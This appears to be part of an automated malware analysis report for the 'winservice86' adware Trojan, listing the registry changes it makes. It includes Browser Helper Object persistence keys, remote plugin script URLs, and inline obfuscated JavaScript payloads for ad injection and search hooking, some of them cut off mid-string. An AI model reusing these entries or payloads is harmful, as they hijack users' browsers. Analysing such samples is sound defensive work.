[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 8C 1C B0 0B 88 D9 06 E1 96 D5 AD 26 BB 93 F6"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\0\win32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\winservice86\Plugins\102]
"Version" = "10"
[HKCU\Software\winservice86\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\winservice86\Plugins\41]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/41.js"
[HKCU\Software\winservice86\Plugins\14]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/14.js"
[HKCU\Software\winservice86\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\winservice86\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\winservice86\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Manifest]
"ModeType" = "production"
[HKCU\Software\winservice86\Plugins\424]
"URL" = "http://js.newcloudrack.com/plugins/mins/424.js"
[HKCU\Software\winservice86\Plugins\44]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/44.js"
"Name" = "IEMisc"
[HKCU\Software\winservice86\Plugins\17]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/17.js"
[HKCU\Software\winservice86\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\winservice86\Plugins\230]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/230.js"
[HKCU\Software\winservice86\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMWUwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1NDFlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonphvvdj'); }"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"CrPublisherId" = "17638"
[HKCU\Software\winservice86\Installer]
"subid" = "0"
[HKCU\Software\winservice86\Plugins\36]
"Name" = "IEBackground"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"pv" = "1.3.25.0"
[HKCU\Software\winservice86\Manifest]
"ChangePrevious" = "false"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"Policy" = "1"
[HKCU\Software\InstalledBrowserExtensions\Corporate Inc]
"64755" = "winservice86"
[HKCU\Software\winservice86\Plugins\273]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MWIxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZDI5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2EyNTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMzQzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOTMwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMDIwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNiMjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZDFhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1MzcyNTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMzkzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTE"
[HKCU\Software\winservice86\Plugins\4]
"Name" = "jquery_1_7_1"
[HKLM\SOFTWARE\winservice86\Installer]
"BundledFirefox" = "1"
[HKCU\Software\winservice86\Plugins\36]
"Version" = "8"
[HKCU\Software\winservice86\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\winservice86\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\winservice86\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOé·¼"
[HKCU\Software\winservice86\Plugins\128]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDk3MDY1NDYwZjE2MTExZjNjMTkxZTU4NTY0NDQ1MGExMTFiMTk1MTVkNTUxYjEzMTA0YzE2MWExOTBlMDAxYzA1MTcwZjRjMDYwMDA0NDQwNTA5NDMxNzAxM2QwODBlMDAwNTVjMTAxZjE0NTgwNjA5MWMwNjFlMDAxOTA5NTkxNTEyMWQxYjE5MWQxZjVjMTkxNzAyMTAyYzBiNTQwYTEwMTk0YTI3MzMyYjIxNTIzNjM0MzEyODIzMzczNDMwMmMyYjJjMzkyZDNmMzQzMDIyMmMyMTJhMmQzNDIxMmYyZTNiMmUyNjNhMzA0ZjFiMTMwODE4MGEwMjEwMGIwZTA0MGU0ZjI1MzMyNzM1MmQzNjNjM2IyMjM2M2YzZTNiMjYzMjM1MzAyNzJhM2YzZjMzM2I0NTRlNmY2NjRiMDMwNjBlMWMxNzMyMTAwOTRkNTM0YjUwMTIxODEwMTcxMTVmNDA0NjFjMDUwZDQyMTcxMjEyMDAxZDBmMDIwMTEyNDIwNzA4MGY0YTE4MWE0NDAxMWMzMzA5MDYwYjBiNDEwMzE4MDI0NTA4MDgxNDBkMTAxZDBhMGU0ZjA4MWMxYzEzMTIxMzAyNGYxZTAxMWYxZTJkMDM1ZjA0MGQwYTRkMzEyZTI1MjA1YTNkM2EyYzNiMjQyMTI5M2UyZDIzMjczNzMwMmMzMzI2M2YyMjIwMjIyNjNhM2MzYzI5MmQzMzI4M2IzODQ0MTUwZTFiMWYxYzFmMWUwYTA2MGYwMDUyMzYzNDMxMjgyMzM3MzQzMDJjMmIyYzM5MmQzYjNjMzQzODJjMjQyMjJjMzQyZDU4NDA2ZTZlNDAxNTAzMWMwYzFiMTQyNTAwNDU1ODQ1NWU1YjUzNzgwNw==', 'rzldgbeoik'); }"
[HKCU\Software\winservice86\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\winservice86\Plugins\7]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/7.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Plugins\35]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/35.js"
[HKCU\Software\winservice86\Plugins\13]
"Version" = "7"
[HKCU\Software\winservice86\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"
[HKCU\Software\winservice86\Plugins\128]
"Name" = "superfish_pricora_m"
[HKCU\Software\winservice86\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\winservice86\Plugins\9]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/9.js"
[HKCU\Software\winservice86\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"
[HKCU\Software\winservice86\Plugins\7]
"Name" = "hooks"
[HKCU\Software\winservice86\Plugins\47]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\263]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/263.js"
[HKCU\Software\winservice86\Plugins\2]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/2.js"
[HKCU\Software\winservice86\Plugins\376]
"Version" = "12"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\winservice86\Plugins\289]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/289.js"
[HKCU\Software\winservice86\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\winservice86\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"
[HKCU\Software\winservice86\Installer]
"srcid" = "002201"
[HKCU\Software\winservice86\Plugins\242]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\380]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTEx"
[HKCU\Software\winservice86\Debug]
"IsDebuggingPlugins" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"
[HKLM\SOFTWARE\winservice86\IE]
"TotalProfiles" = "1"
[HKCU\Software\winservice86\Plugins\64]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/64.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Plugins\242]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/242.js"
[HKCU\Software\winservice86\Plugins\220]
"Version" = "25"
[HKCU\Software\winservice86\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\winservice86\Plugins\339]
"Name" = "adworks_jobs_m"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppName" = "winservice86-bg.exe"
[HKCU\Software\winservice86\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"
[HKCU\Software\winservice86\Installer]
"ErrorsDomain" = "http://errors.newdemoonlinecloud.com"
[HKCU\Software\winservice86\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\winservice86\Plugins\390]
"Version" = "1"
[HKCU\Software\winservice86\Plugins\93]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/93.js"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"Name" = "Corporate Inc"
[HKCU\Software\winservice86\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var 